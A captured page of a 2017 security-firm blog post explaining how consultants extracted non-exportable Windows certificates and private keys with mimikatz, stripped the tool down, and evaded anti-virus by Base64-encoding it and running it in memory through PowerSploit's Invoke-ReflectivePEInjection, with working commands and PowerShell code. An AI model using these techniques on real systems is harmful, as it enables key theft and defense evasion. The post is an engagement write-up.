insinuator.net
Open in
urlscan Pro
185.144.92.202
Public Scan
URL:
https://insinuator.net/2017/10/extract-non-exportable-certificates-and-evade-anti-virus-with-mimikatz-and-powersploit/
Submission: On July 10 via manual from CA — Scanned from CA
Submission: On July 10 via manual from CA — Scanned from CA
Form analysis 1 forms found in the DOM
GET https://insinuator.net/
<form role="search" method="get" class="search-form" action="https://insinuator.net/">
<label>
<span class="screen-reader-text">Search for:</span>
<input type="search" class="search-field" placeholder="Search …" value="" name="s">
</label>
<button type="submit" class="search-submit"> Search </button>
</form>Text Content
Insinuator.net
Bold Statements
Primary Menu
* About
* RSS Feed
* Follow us
CATEGORIES
* Breaking
* Building
* Events
* Misc
TAGS
4G Active Directory advisory Android Black Hat blackhoodie Bluetooth C3 Cisco
cloud Day-Con disclosure Docker ERNW white paper exploit forensics fuzzing GSM
hardening hardware HITB iOS IoT IPv6 Linux malware medical network pentest
reversing RIPE risk SAP SDR Telco TelcoSecDay tool TROOPERS trust virtualization
VMware VoIP vulnerability web application Windows
ARCHIVES
Archives Select Month June 2024 (2) May 2024 (3) April 2024 (4) February 2024
(1) October 2023 (3) September 2023 (2) August 2023 (1) July 2023 (1) June
2023 (2) May 2023 (3) December 2022 (1) September 2022 (2) August 2022 (1)
June 2022 (1) April 2022 (1) March 2022 (1) December 2021 (1) October 2021
(1) July 2021 (1) May 2021 (4) April 2021 (2) March 2021 (1) February 2021
(3) January 2021 (5) December 2020 (4) November 2020 (6) October 2020 (2)
September 2020 (5) July 2020 (3) June 2020 (1) May 2020 (1) April 2020 (2)
March 2020 (3) February 2020 (3) January 2020 (2) December 2019 (2) November
2019 (6) October 2019 (4) September 2019 (3) August 2019 (3) July 2019 (6)
June 2019 (6) May 2019 (7) April 2019 (7) March 2019 (2) February 2019 (4)
January 2019 (14) December 2018 (4) November 2018 (11) October 2018 (6)
September 2018 (1) August 2018 (4) July 2018 (3) June 2018 (3) May 2018 (3)
April 2018 (5) March 2018 (8) February 2018 (12) January 2018 (2) December
2017 (2) November 2017 (3) October 2017 (7) September 2017 (5) August 2017
(3) July 2017 (3) June 2017 (6) May 2017 (5) April 2017 (3) March 2017 (8)
February 2017 (6) January 2017 (8) December 2016 (12) November 2016 (14)
October 2016 (12) September 2016 (12) August 2016 (9) July 2016 (9) June
2016 (7) May 2016 (10) April 2016 (23) March 2016 (29) February 2016 (14)
January 2016 (12) December 2015 (15) November 2015 (6) October 2015 (9)
September 2015 (7) August 2015 (5) July 2015 (6) June 2015 (14) May 2015
(9) April 2015 (9) March 2015 (13) February 2015 (10) January 2015 (18)
December 2014 (10) November 2014 (10) October 2014 (7) September 2014 (3)
August 2014 (9) July 2014 (5) June 2014 (1) May 2014 (9) April 2014 (1)
March 2014 (3) February 2014 (5) January 2014 (13) December 2013 (5)
November 2013 (5) October 2013 (4) September 2013 (1) August 2013 (10) July
2013 (10) June 2013 (5) May 2013 (4) April 2013 (10) March 2013 (4)
February 2013 (12) January 2013 (6) December 2012 (2) November 2012 (4)
October 2012 (1) September 2012 (3) July 2012 (3) June 2012 (3) May 2012
(8) April 2012 (2) March 2012 (5) February 2012 (6) January 2012 (4)
December 2011 (7) November 2011 (7) October 2011 (6) September 2011 (3)
August 2011 (3) July 2011 (6) June 2011 (4) May 2011 (4) April 2011 (5)
March 2011 (5) January 2011 (2) December 2010 (6) November 2010 (5) October
2010 (3) September 2010 (4) August 2010 (5) July 2010 (6) June 2010 (2)
December 2009 (1) November 2009 (1) October 2009 (3) 0 (1)
Search for: Search
* ERNW
* ERNW Research
Back
Breaking
October 20, 2017 by Kevin Kelpen
EXTRACT NON-EXPORTABLE CERTIFICATES AND EVADE ANTI-VIRUS WITH MIMIKATZ AND
POWERSPLOIT
Some time ago, one of our customers contacted us with a special request. For
some legitimate reason, they needed to centrally collect certain certificates
including their private keys which were distributed across many client systems
running Windows and stored in the corresponding user stores. Unfortunately (only
in this case, but actually good from a security perspective), the particular
private keys were marked non-exportable making a native export in the context of
the user impossible. As if this wasn’t enough, the extraction was supposed to be
executed in the context of the current user (i.e. without administrative
privileges) while not triggering the existing Anti Virus solution at all. Also,
the certificates needed to be transferred to some trusted system where they
could not be accessed in an unauthorized way. So let’s have a look how we
tackled these problems:
CERTIFICATE/KEY EXTRACTION WITH MIMIKATZ
While there were other possibilities to investigate like extracting the DPAPI
protected certificates directly from the AD and trying to reverse engineer the
encryption process, we decided to take an approach with a predictable effort by
using mimikatz. Extracting non-exportable certificates from the user store
including their private keys is pretty straightforward with mimikatz. You simply
issue the following commands and the PFX files will be exported to the mimikatz
directory:
crypto::capi
crypto::certificates /export /store:MY /systemstore:CURRENT_USER
The first command patches the Windows Crypto API so that non-exportable
certificates can be exported and the second one does the actual export.
STRIPPING FUNCTIONALITIES FROM MIMIKATZ
So we can extract the the certificates which is good. But mimikatz is a pretty
powerful tool and can do a lot more like extracting NTLM hashes, passwords,
tickets and so on. Certainly, we don’t want all these functionalities being
potentially available on the client systems, especially when we want to evade AV
(but see below on that topic). Conveniently, mimikatz is open source software so
we can build our own version with all these functionalities stripped off.
Following the build instructions we need to set up Visual Studio and import the
mimikatz project. In the Solution Explorer View we can safely exclude all files
in the following directories and their subdirectories by right clicking the
.c/.h files and selecting “Exclude from Project”:
mimikatz/modules/dpapi
mimikatz/modules/kerberos
mimikatz/modules/sekurlsa
In the mimikatz/modules subdirectory we can exclude all files except the
following:
kull_m.h
kull_m_crypto.c
kull_m_crypto.h
kull_m_standard.c
kull_m_standard.h
In the mimikatz directory we can exclude all except the following .c/.h files:
crypto
crypto_system
file
kernel
memory
minidump
output
patch
process
registry
registry_structures
service
mimikatz
In order that mimikatz can still be built without errors you need to modify the
mimikatz.h by removing all unnecessary includes except the following:
#include "globals.h"
#include "modules/kuhl_m_standard.h"
#include "modules/kuhl_m_crypto.h"
#include <io.h>
#include <fcntl.h>
Additionally, mimikatz.c needs to be modified in the following way: Remove all
unneeded commands from the const KUHL_M * mimikatz_modules[] array. In our case
it now looks like this:
const KUHL_M * mimikatz_modules[] = {
&kuhl_m_standard,
&kuhl_m_crypto,
};
Furthermore, we need to comment out all function calls of excluded modules. In
our case these were the following lines:
kull_m_asn1_init();
kull_m_asn1_term();
status = kuhl_m_kernel_do(full + 1);
status = kuhl_m_rpc_do(full + 1);
Now we can build our own version of mimikatz with all unnecessary
functionalities stripped off. To further lock down the functionality one could
even modify mimikatz.c so that it directly executes our commands without
providing all of the crypto and standard commands to the user.
Note that this was done using a mimikatz version pulled from Git end of June
2017. As the source code might have changed, the process of removing
functionalities might have too. However, you can use this as a starting point to
build your own customized version of mimikatz.
ANTI-VIRUS EVASION, THE POWERSHELL WAY
The next requirement was the evasion of the Anti-Virus engine. As expected, our
modifications were not sufficient to bypass the AV already. While there are
sophisticated tools for packing and encrypting binaries to evade the AV, some
rather simple approaches might do the job as well as them. By Base64-encoding
our binary and executing it with Invoke-ReflectivePEInjection we were able to
successfully evade the AV detection. We can convert our binary to base64 in
Powershell like this:
$file = "<PathToFile>"
$fileBytes = [System.IO.File]::ReadAllBytes($file)
$base64Str = [System.Convert]::ToBase64String($fileBytes)
$base64Str | Out-File -filepath "<outputPath>/out.txt"
Then we need to create a Powershell script containing our base64 encoded binary
(In this case, place the Invoke-ReflectivePEInjection in the same directory):
. .\Invoke-ReflectivePEInjection.ps1
$ExeStr = "<String from out.txt>"
$ExeBytes = [System.Convert]::FromBase64String($ExeStr)
Invoke-ReflectivePEInjection -PEBytes $ExeBytes -ExeArgs "<Arg1> <Arg2> ..."
If this is not enough to evade the AV, there are many more possibilities to do
this in a more stealthy way:
* Additionally encrypt the encoded binary and decrypt it during runtime only
* Download the binary and the Invoke-ReflectivePEInjection (in an encrypted
form) over the network within the Powershell script and directly inject
everything in memory
SECURE COLLECTION OF PRIVATE KEYS
To securely collect the certificates and especially their private keys from each
client system on a central server, different possibilities come to mind:
* A network share which is write only
* A network accessible database where users have INSERT rights only
* Some form of hybrid encryption protecting the keys in transit too
While the first two options would provide protection of the private keys against
unauthorized accesses, the third one also provides protection of the private
keys on the network when in transit. For this reason, we decided to secure the
private key of each certificate with a strong and unique password and to encrypt
this password with a public key which in turn was included in the extraction
script. Ultimately, the private key of each certificate is protected with an
individual and strong password in transit and can then be decrypted on some
secure and trusted system by the private key corresponding to the public key
used for the encryption.
We hope we could share some new technical details with you!
Cheers,
Kevin
Back
* 2 Klicks für mehr Datenschutz: Erst wenn Sie hier klicken, wird der Button
aktiv und Sie können Ihre Empfehlung an Facebook senden. Schon beim
Aktivieren werden Daten an Dritte übertragen - siehe i. nicht mit Facebook
verbunden
* 2 Klicks für mehr Datenschutz: Erst wenn Sie hier klicken, wird der Button
aktiv und Sie können Ihre Empfehlung an Twitter senden. Schon beim Aktivieren
werden Daten an Dritte übertragen - siehe i. nicht mit Twitter verbunden
* Wenn Sie diese Felder durch einen Klick aktivieren, werden Informationen an
Facebook, Twitter, Flattr, Xing, t3n, LinkedIn, Pinterest oder Google
eventuell ins Ausland übertragen und unter Umständen auch dort gespeichert.
Näheres erfahren Sie durch einen Klick auf das i.
Mimikatz
POST NAVIGATION
TROOPERS for Students!
Interacting with the BlueCoat Filesystem
COMMENTS
1. Nitin says:
October 11, 2018 at 10:01 pm
how we can do similar in android devices, to extraxt the private key/
signing keys?
would this work?
lets say you want to access the corporate Outlook emails on mobile?
or have IM like skype for business to be able to run on your personal
mobile? is it possible
Comments are closed.
Imprint | Privacy Policy | ©2024 ERNW Enno Rey Netzwerke GmbH
*
*